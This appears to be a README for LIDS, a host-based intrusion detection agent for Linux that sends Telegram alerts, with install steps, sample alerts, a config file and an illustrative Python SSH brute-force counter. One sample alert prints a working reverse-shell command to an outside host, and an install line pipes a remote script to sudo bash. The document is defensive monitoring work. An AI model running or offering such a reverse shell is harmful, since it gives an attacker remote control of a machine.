Real-time attack detection · Telegram alerts
Lightweight host-based security monitoring agent for Kali Linux · Parrot OS · Arch Linux

Python | Linux | MIT

| Module | What it detects |
|---|---|
| Port Monitor | New ports opened, suspicious ports (4444,1337 etc.) |
| SSH Monitor | Weak SSH configs, root login, password auth |
| Log Monitor | Brute force attacks, login abuse |
| Backdoor Scanner | Reverse shells, cron persistence |
| Process Monitor | Cryptominers, suspicious binaries |
| Malware Scan | rkhunter / chkrootkit integration |
| Firewall Control | Block IP with iptables / ufw |
| Telegram Alerts | Real-time attack notifications |

```bash
git clone https://github.com/Yescrypt/lids
cd lids
sudo bash install.sh
```

```bash
curl -s https://raw.githubusercontent.com/Yescrypt/lids/main/install.sh | sudo bash
```

Installer asks:
- Hostname label
- OS name
- Telegram User ID
LIDS then registers and starts monitoring.

```
🚨 SSH Brute Force Attack
Host: kali-lab
IP: 185.x.x.x
Attempts: 32
[🚫 BLOCK IP] [🔍 WHOIS] [IGNORE]
```

```
🚨 Reverse Shell Detected
PID: 2211
CMD: bash -i >& /dev/tcp/192.168.1.5/4444
[KILL] [TRACE] [IGNORE]
```

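
How a count like the `Attempts` field in the SSH brute-force alert above can be derived, as an added example that is not LIDS's own code: it counts sshd `Failed password` lines per source IP inside a sliding time window and skips addresses listed under `whitelist_ips`. The threshold, window length, syslog line format, year and all sample log lines are assumptions constructed for the illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Traditional syslog sshd failure line (assumed format, e.g. /var/log/auth.log).
FAILED = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?\S+ from (\S+) port \d+"
)
CONFIG = {"whitelist_ips": ["192.0.2.10"]}  # same key as lids.conf; value is constructed

def detect_bruteforce(lines, whitelist_ips=(), threshold=5, window=60, year=2026):
    """Return {ip: peak failures inside any `window`-second span} for IPs that
    reach `threshold`. threshold, window and year are assumed parameters."""
    recent = defaultdict(deque)  # ip -> failure timestamps still inside the window
    peak = {}
    for line in lines:
        m = FAILED.match(line)
        if not m or m.group(2) in whitelist_ips:
            continue  # not a failure line, or a trusted source
        stamp, ip = m.groups()
        ts = datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window:
            q.popleft()  # slide the window forward
        if len(q) >= threshold:
            peak[ip] = max(peak.get(ip, 0), len(q))
    return peak

def _line(sec, ip, user="root"):
    # Builds one constructed log line, `sec` seconds after 10:00:00.
    return (f"Mar 14 10:{sec // 60:02d}:{sec % 60:02d} kali-lab sshd[4242]: "
            f"Failed password for {user} from {ip} port 50022 ssh2")

SAMPLE_LOG = (  # constructed input, documentation IP ranges only
    [_line(s, "203.0.113.7") for s in range(0, 12, 2)]  # 6 failures in 10 s
    + [_line(s, "198.51.100.20", "invalid user admin") for s in range(0, 500, 100)]  # slow, 100 s apart
    + [_line(s, "192.0.2.10") for s in range(6)]  # whitelisted source
    + ["Mar 14 10:09:00 kali-lab sshd[4242]: Accepted publickey for alice from 192.0.2.55 port 50100 ssh2"]
)

if __name__ == "__main__":
    print(detect_bruteforce(SAMPLE_LOG, whitelist_ips=set(CONFIG["whitelist_ips"])))
```

The slow source at 198.51.100.20 never accumulates five failures inside one window, which is the trade-off of any rate-based threshold: widening the window catches slower guessing at the cost of more false positives.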
`/etc/lids/lids.conf`

```json
{
  "scan_interval": 30,
  "whitelist_ports": [22, 80, 443],
  "whitelist_processes": ["nmap", "netcat"],
  "whitelist_ips": []
}
```

```bash
systemctl status lids
systemctl restart lids
tail -f /var/log/lids/lids.log
```

Report vulnerabilities responsibly:
@anonim_xatbot
MIT License © 2026 LIDS Contributors
See the LICENSE file for details.